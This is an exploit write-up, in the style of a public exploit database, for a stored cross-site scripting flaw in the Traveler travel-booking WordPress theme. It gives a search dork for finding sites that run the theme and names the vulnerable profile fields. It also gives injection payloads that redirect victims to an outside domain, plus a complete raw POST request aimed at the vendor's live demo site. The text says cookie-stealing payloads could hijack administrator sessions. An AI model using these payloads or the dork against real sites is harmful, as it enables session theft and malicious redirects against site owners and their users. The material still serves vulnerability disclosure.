# Exploit Title: Travel Booking WordPress Theme v2.7.8.5 Persistent XSS # Google Dork: /wp-content/themes/traveler/ # Date: 11/01/2020 # Exploit Author: m0ze # Vendor Homepage: https://travelerwp.com/ # Software Link: https://themeforest.net/item/traveler-traveltourbooking-wordpress-theme/10822683 # Version: 2.7.8.5 # Tested on: Kali Linux # CVE: - # CWE: 79 ----[]- Info: -[]---- Demo website: https://mixmap.travelerwp.com/ PoC Profile: https://mixmap.travelerwp.com/author/m0ze2/ ----[]- Persistent XSS -> User Profile: -[]---- Possibility to use any cookie stealing payload to hijack user/administrator session or force redirect to malicious website. Vulnerable input fields: «Paypal Email», «Phone Number» and «Home Airport». Vulnerable textarea: «About Yourself». Payload Sample (for input): "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;> Payload Sample (for textarea): </textarea><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;> PoC: POST /page-user-setting/?sc=setting&id_user HTTP/1.1 Host: mixmap.travelerwp.com User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------191691572411478 Content-Length: 2210 Origin: https://mixmap.travelerwp.com Connection: close Referer: https://mixmap.travelerwp.com/page-user-setting/?sc=setting&id_user Cookie: _your_cookies_here_ Upgrade-Insecure-Requests: 1 -----------------------------191691572411478 Content-Disposition: form-data; name="st_update_user" ba1d73a992 -----------------------------191691572411478 Content-Disposition: form-data; name="_wp_http_referer" /page-user-setting/?sc=setting&id_user -----------------------------191691572411478 Content-Disposition: form-data; name="id_user" 1672 -----------------------------191691572411478 Content-Disposition: form-data; name="st_paypal_email" "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;> -----------------------------191691572411478 Content-Disposition: form-data; name="st_email" asdasd@asdasd.com -----------------------------191691572411478 Content-Disposition: form-data; name="st_phone" "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;> -----------------------------191691572411478 Content-Disposition: form-data; name="st_bio" </textarea><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;> -----------------------------191691572411478 Content-Disposition: form-data; name="st_is_check_show_info" on -----------------------------191691572411478 Content-Disposition: form-data; name="id_avatar" 10928 -----------------------------191691572411478 Content-Disposition: form-data; name="st_avatar"; filename="" Content-Type: application/octet-stream -----------------------------191691572411478 Content-Disposition: form-data; name="st_airport" "><img src=x onerror=alert(`m0ze`);window.location=`https://m0ze.ru`;> -----------------------------191691572411478 Content-Disposition: form-data; name="st_province" -----------------------------191691572411478 Content-Disposition: form-data; name="st_address" -----------------------------191691572411478 Content-Disposition: form-data; name="st_zip_code" -----------------------------191691572411478 Content-Disposition: form-data; name="st_city" -----------------------------191691572411478 Content-Disposition: form-data; name="st_country" -----------------------------191691572411478 Content-Disposition: form-data; name="st_btn_update" Save Changes -----------------------------191691572411478--